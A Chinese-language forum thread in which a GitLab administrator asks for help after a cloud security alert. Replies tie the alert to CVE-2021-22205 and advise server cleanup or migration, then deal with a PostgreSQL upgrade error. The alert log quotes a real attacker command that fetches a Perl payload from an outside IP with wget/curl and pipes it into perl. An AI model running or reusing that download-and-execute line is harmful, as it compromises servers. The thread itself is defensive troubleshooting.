gitlab感染木马病毒无法找到根源请协助谢谢!

我部署的gitlab在阿里云上,已使用很长时间了,最近突然云安全中心告警,检测到gitlab服务器有恶意脚本代码执行。经多次排查没有找到源头,望各位大神协助,万分感谢!

告警详情内容如下:

该告警由如下引擎检测发现:

命令行: sh -c cd /tmp;w\get -O - http://209.97.132.66:81/git|perl;cd /tmp;curl -sS http://209.97.132.66:81/git|perl

进程PID: 19486

进程文件名: bash

父进程ID: 19484

父进程: perl

父进程文件路径: /usr/bin/perl

进程链:

-[1838] runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................
-[1856] runsv gitlab-workhorse
-[5955] /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -prometheusListenAddr localhost:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml
-[19484] /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -

事件说明: 云安全中心检测到您的主机正在执行恶意的脚本代码(包括但不限于bash、powershell、python),请立刻排查入侵来源。如果是您的运维行为,请选择忽略。

你所使用的版本号是??

我猜应该是受到了【CVE-2021-22205】漏洞影响,从11.9开始,低于以下版本都存在:

  • 13.10.3
  • 13.9.6
  • 13.8.8

Remote code execution when uploading specially crafted image files

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that is passed to a file parser which resulted in a remote command execution. This is a critical severity issue (A V:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H, 9.9). It is now mitigated in the latest release and is assigned CVE-2021-22205.

参见:https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/

最后,建议经常更新gitlab,使自己保持最新。

我的版本是 [12.3.5],那我现在是否要找到木马删除?还是直接升级可解决?

很高兴能帮助到你,这里是社区,我不是官方人员,作为普通用户免费分享我的经验。

由于是安全领域的问题,只凭借有限的日志信息,无法判断你受影响的程度,我相信官方人员也无法只凭借这些信息给出实质性的建议。

升级版本只能保证当前漏洞被封堵,不能保证之前黑客是否植入了其他后门程序。

我只是给你建议,两个方案:

检查清理服务器

检查并清理当前服务器,如果同网段下还有其他服务器,也需要检查,包括但不限于:

  • 检查可疑进程
  • 检查服务器相关日志
  • 检查网络监听端口
  • 操作系统可疑账号

创建新的极狐GitLab服务器

最简单也是最有效的方式,放弃旧服务器,直接安装新服务器,将gitlab搬迁过去,这样可以最大程度的避免黑客植入其他后门程序。

你好,感谢你的耐心帮助,我看了文档说只能同版本迁移,如果将数据迁移到高版本可能异常。我也是想安装新的服务器,有没有更好方法将数据迁移新版本上。

我现在按版本逐一升级,当升级到gitlab-ce-14.0.12,出现PG无法启动,日志提示database files are incompatible with server, The data directory was initialized by PostgreSQL version 11, which is not compatible with this version 12.7 我之前11版,现在自动升级到12.7,导致PG无法启动,有什么解决方法?

您好,升级之前要备份一下哦,避免出现意外。

官方在升级是有升级路径的,参考:https://docs.gitlab.com/ee/update/index.html#upgrade-paths

在 14.0.0 版本中已经放弃 PostgreSQL 11 的支持,需要提前升级到 12,文档中也有体现,参考:https://docs.gitlab.com/ee/update/index.html#1400,其中提到了对 PostgreSQL 的升级:https://docs.gitlab.com/omnibus/settings/database.html#upgrade-packaged-postgresql-server

其实官方文档已经非常完善了。

感谢回复,升级前有备份的,我恢复后再重新操作升级一下看看。